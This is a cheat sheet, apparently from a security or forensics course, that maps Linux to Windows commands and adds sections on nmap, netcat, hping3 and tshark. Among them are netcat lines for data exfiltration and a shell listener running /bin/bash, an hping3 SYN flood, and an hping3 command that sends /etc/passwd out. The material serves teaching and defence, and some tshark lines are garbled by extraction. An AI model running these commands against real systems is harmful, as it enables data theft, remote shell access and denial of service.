Function Linux Command Windows Command Description

Listing Files ls dir Lists files in a directory

ls -a dir /a Lists all files, including hidden
files
ls -l dir /q Lists files in long format, showing
permissions, owner, size
ls -R tree Lists directory contents recursively
Copying Files cp source dest copy source dest Copies a file from source to
destination
cp -r source_directory/ xcopy source_directory Recursively copies all files and
dest/ dest /E directories
Moving & mv oldname newname ren oldname newname Renames or moves a file
Renaming
mv [Link] move [Link] destination Moves file to a specified directory
/path/to/directory/
Deleting Files rm [Link] del [Link] Deletes a file
rm -r directory rmdir /s directory Recursively deletes a directory and
its contents
Creating Files touch filename echo.> filename Creates an empty file
Viewing File cat [Link] type [Link] Displays contents of a file
Contents
head -n 5 [Link] more [Link] Displays the first 5 lines of a file
tail -n 5 [Link] type [Link] Displays the last 5 lines of a file
Directory cd /path/to/directory cd \path\to\directory Changes directory
Navigation
pwd cd (no arguments) Displays the current directory
tree tree Shows directory structure in tree
format
File Permissions chmod 755 filename icacls filename /grant Sets file permissions
user:F
chmod 770 ~/projects icacls folder /grant Sets read, write, execute
~/resources user:F permissions for owner/group
chown user:group [Link] takeown /f filename Changes ownership of a file
Disk Usage df -h wmic logicaldisk get Shows disk usage
size,freespace
du -sh /path/to/directory chkdsk Shows size of a specific directory
System uname -a systeminfo Displays system information
Information
uptime systeminfo Shows system uptime
free -h systeminfo Shows memory usage
lscpu wmic cpu get name Displays CPU information
lsusb [Link] Displays USB device information
lspci [Link] Displays PCI device information
Network ifconfig ipconfig Shows network interfaces and
Management configurations
ping address ping address Tests network connectivity
netstat -tulnp netstat -an Shows network connections
traceroute address tracert address Traces the route packets take to a
network
nslookup domain nslookup domain Queries DNS for domain name or
IP
Process ps aux tasklist Lists running processes
Management
kill PID taskkill /PID Terminates a process by PID
top taskmgr Displays real-time processes and
resource usage
nice -n 10 command start /low command Starts a command with specified
priority
User Management useradd username net user username /add Adds a new user
| P a g e 15
 passwd username net user username * Sets or changes a user's password
passwd -l root net user Administrator Locks a user account
/active:no
passwd -u root net user Administrator Unlocks a user account
/active:yes
userdel username net user username Deletes a user
/delete
whoami whoami Shows the current user
groups username net localgroup Displays groups a user belongs to
sudo visudo -f - Edits the sudoers file for
/etc/sudoers permissions
sudo usermod -aG group net localgroup group Adds a user to a group
username username /add
Environment export VAR=value set VAR=value Sets environment variables
Variables
printenv VAR echo %VAR% Displays an environment variable
Text Processing grep "pattern" [Link] findstr "pattern" [Link] Searches for a pattern in a file
awk '{print $1}' [Link] - Text processing and manipulation
sed 's/old/new/g' [Link] sed Replaces text in a file
sort [Link] sort Sorts lines in a file
uniq [Link] uniq Removes duplicate lines
wc -l [Link] find /c Counts lines, words, and characters
in a file
Archiving & tar -cvf [Link] files tar Archives files into a .tar file
Compression
gzip file gzip file Compresses a file using gzip
zip [Link] file zip [Link] file Creates a .zip archive
unzip [Link] unzip [Link] Extracts a .zip archive
Scheduling Tasks cron / crontab -e schtasks Schedules tasks
at 15:00 /path/to/[Link] at 15:00 task Executes a task at a specified time
Forensics dd if=/dev/sdX diskcopy Copies data at the block level
of=[Link]
strings file Sysinternals strings Extracts readable text from binary
files
sha256sum file certutil -hashfile file Checks file integrity using SHA-
SHA256 256
mount /dev/sdX /mnt diskpart Mounts or unmounts file systems
lsof handle (Sysinternals) Lists open files
Shutdown & shutdown -h now shutdown /s Shuts down the system
Reboot
reboot shutdown /r Reboots the system
poweroff shutdown /s Powers off the system
Help & man command command /? Displays manual for a command
Documentation
info command - Displays detailed information
about a command
Additional su - username Switch to another user
commands
sudo ls /root Execute ls as root
sudo groupadd project Create a group project
sudo usermod -aG project Add user to group project
student
grep -i "unauthorized" Search logs for unauthorized
/var/log/[Link] access
Nmap Commands sudo nmap -sn [Link]/24 Discovers active hosts
sudo nmap -sS -p 1-1000 [IP_address] SYN scan of ports 1-1000
sudo nmap -sV -sS -p 80,443,22 [IP_address] Detects service versions
sudo nmap -O [IP_address] OS detection
sudo nmap --script vuln [IP_address] Scans for common vulnerabilities
| P a g e 16
Netcat (nc) nc -v [IP_address] [port] Retrieves server banners
Commands
nc -zv [IP_address] 20-80 Scans ports
nc -lp 55555 > sensitive_data.txt Sets up a listener for file transfer
nc [Server_IP] 55555 < extracted_data.txt Simulates data exfiltration
nc -lp 4444 -e /bin/bash Reverse shell listener
nc [Target_IP] 4444 Connects to reverse shell
hping3 sudo hping3 -S --flood -p 80 [IP_address] SYN flood test
Commands
sudo hping3 -A -p 80 [IP_address] ACK scan (firewall testing)
sudo hping3 -2 -p 53 [IP_address] UDP port scan
sudo hping3 -1 [IP_address] ICMP scan for blocked pings
sudo hping3 -c 1 [IP_address] -d 100 -E /etc/passwd Simulates data exfiltration
Wireshark `[Link] == [Target_IP] && (tcp
Commands
[Link]==1 && [Link]==1 Tracks connection resets and
anomalies in TCP responses
Captures ARP traffic to detect
sudo tshark -i eth0 -f "arp"
ARP spoofing (MITM attack).
Monitors DNS traffic for malicious
sudo tshark -i eth0 -f "udp port 53"
redirects.
Captures and analyzes HTTP
sudo tshark -i eth0 -f "tcp port 80" traffic for suspicious patterns like
data exfiltration.
Monitors FTP traffic for potential
sudo tshark -i eth0 -f "tcp port 21"
data exfiltration.
Captures TCP SYN packets to
sudo tshark -i eth0 -Y "[Link] == 1 &&
detect potential SYN flood DoS
[Link] == 0"
attacks.
Captures POST requests during a
sudo tshark -i eth0 -f "tcp port 80" -Y
DoS attack to check for data
"[Link] == POST"
exfiltration.
`sudo netstat -anp `netstat -ano
Blocks IPs involved in DoS
sudo iptables -A INPUT -s <attacker_IP> -j DROP
attacks.
Extracts browsing history entries
sqlite3 /path/to/[Link] "SELECT url, title FROM
SQLite that match specific queries (e.g.,
urls WHERE url LIKE '%query%'
phishing URLs).
Retrieves call logs from a SQLite
sqlite3 /path/to/[Link] "SELECT * FROM calls;"
database.
Recovers deleted files from a
foremost -i /path/to/device -o /output_directory
storage device.
lsusb Lists any external devices

| P a g e 17